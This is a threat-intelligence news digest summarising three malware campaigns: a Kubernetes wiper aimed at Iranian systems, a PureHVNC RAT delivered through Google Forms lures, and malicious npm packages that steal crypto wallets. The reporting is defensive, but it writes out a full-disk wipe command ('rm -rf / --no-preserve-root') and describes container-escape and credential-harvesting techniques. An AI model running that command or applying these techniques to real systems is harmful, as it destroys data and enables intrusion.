Trending Topics

TeamPCP Deploys Iran-Targeted Wiper in Kubernetes Attacks

A newly observed campaign by TeamPCP is targeting Kubernetes clusters with a destructive malware variant that selectively wipes systems configured for Iran while maintaining persistence elsewhere. The operation builds directly on the earlier CanisterWorm activity, reusing the same ICP-based command-and-control (C2) infrastructure, backdoor logic, and /tmp/pglog drop path, but introduces a geopolitically targeted payload. When the malware detects Iranian timezone and locale settings, it deploys a Kubernetes DaemonSet named “Host-provisioner-iran,” which mounts the host filesystem and executes a “kamikaze” container that deletes all top-level directories before forcing a reboot across nodes. If Kubernetes is not present, the malware executes a direct rm -rf / --no-preserve-root wipe, attempting passwordless sudo if needed. In non-Iranian environments, the malware instead deploys a DaemonSet that installs a persistent Python backdoor via systemd services, ensuring continued access across all nodes. While earlier variants relied on Kubernetes-native lateral movement via DaemonSets, newer samples use SSH-based propagation, harvesting private keys, and parsing authentication logs to identify valid credentials for lateral access. The malware also abuses exposed Docker APIs, deploys privileged Alpine containers with full host filesystem mounts to execute payloads, and generates observable indicators, such as outbound SSH connections with disabled host key checking and traffic to port 2375 across local networks. These techniques enable the malware to operate across both containerized and traditional infrastructures, significantly increasing its reach. Combined with its reuse of established C2 infrastructure and adaptive deployment strategies, this campaign highlights a mature threat actor capable of blending persistence, automation, and targeted destruction, reinforcing the growing risk to cloud-native and hybrid environments. Organizations should restrict access to Kubernetes APIs and Docker daemons, enforce strong authentication (no passwordless sudo or exposed SSH keys), and monitor for anomalous DaemonSet deployments or outbound SSH activity to prevent unauthorized lateral movement and destructive payload execution.

Google Forms Abuse Delivers PureHVNC RAT via Business-Themed Lures

A newly observed campaign is leveraging trusted platforms like Google Forms and LinkedIn to distribute the PureHVNC Remote Access Trojan (RAT), shifting initial access away from traditional phishing emails to more credible business workflows. Attackers create convincing forms impersonating legitimate companies and prompt victims to download business-themed ZIP files tied to job interviews, project briefs, or financial documents. These archives, often hosted on services like Dropbox or hidden behind URL shorteners, contain a mix of legitimate-looking PDFs and malicious executables paired with DLLs such as msimg32[.]dll, which trigger the infection via DLL hijacking. Once executed, the malware initiates a multi-stage infection chain that includes anti-analysis checks, self-deletion, and the launch of decoy documents to avoid suspicion. It then extracts additional payloads into ProgramData directories and executes obfuscated Python scripts that ultimately deploy shellcode. The final stage injects PureHVNC into legitimate processes like SearchUI.exe, granting attackers full remote control and enabling extensive data exfiltration. Beyond initial compromise, the malware establishes strong persistence and surveillance capabilities, making it highly effective for long-term access and data theft. It creates registry-based persistence and scheduled tasks using encoded PowerShell commands, often with elevated privileges, ensuring it survives reboots and remains hidden. PureHVNC collects detailed system information via WMI queries and targets sensitive data from browsers, extensions, cryptocurrency wallets, and applications such as Telegram and Foxmail. Its modular architecture allows attackers to deploy additional plugins, expanding functionality based on operational needs. Users should avoid downloading files from unsolicited Google Forms or business requests, verify opportunities through official company channels, and block execution of untrusted archives to reduce the risk of multi-stage RAT infections.

Ghost Campaign Uses Malicious npm Packages to Steal Crypto Wallets

A newly identified “Ghost” campaign is leveraging malicious npm packages to compromise developers by disguising malware within seemingly legitimate libraries. The operation involves multiple packages published under a single user, which appear as developer utilities but execute malicious code after installation. Instead of relying solely on sophisticated payloads, the campaign’s key innovation is the use of fake npm install logs that mimic legitimate installation processes, complete with progress bars and delays to avoid suspicion. During this staged output, victims are prompted to enter their sudo password under the pretense of resolving installation issues, effectively handing over elevated access. Once credentials are captured, the malware silently downloads and decrypts a second-stage payload using infrastructure hosted on Telegram or web3-based platforms. The final stage deploys a remote access trojan (RAT) capable of stealing cryptocurrency wallets, sensitive data, and executing commands from a command-and-control server. Beyond initial compromise, the campaign demonstrates a broader evolution in software supply chain attacks, combining social engineering with trusted development workflows to maximize effectiveness. The malicious packages introduce randomized delays, misleading error messages, and fake dependency installations to create a convincing user experience that blends seamlessly into standard developer practices. In parallel, attackers also leverage GitHub repositories and AI-assisted workflows to distribute similar payloads, further expanding their reach and credibility within developer ecosystems. Once deployed, the malware harvests a wide range of sensitive data, including browser credentials, SSH keys, cloud configurations, and cryptocurrency wallets, and often exfiltrates it via Telegram-based infrastructure. Developers should only install packages from verified publishers, avoid entering sudo credentials during package installation unless explicitly required and validated, and implement dependency scanning and monitoring to detect malicious post-install scripts and anomalous behavior.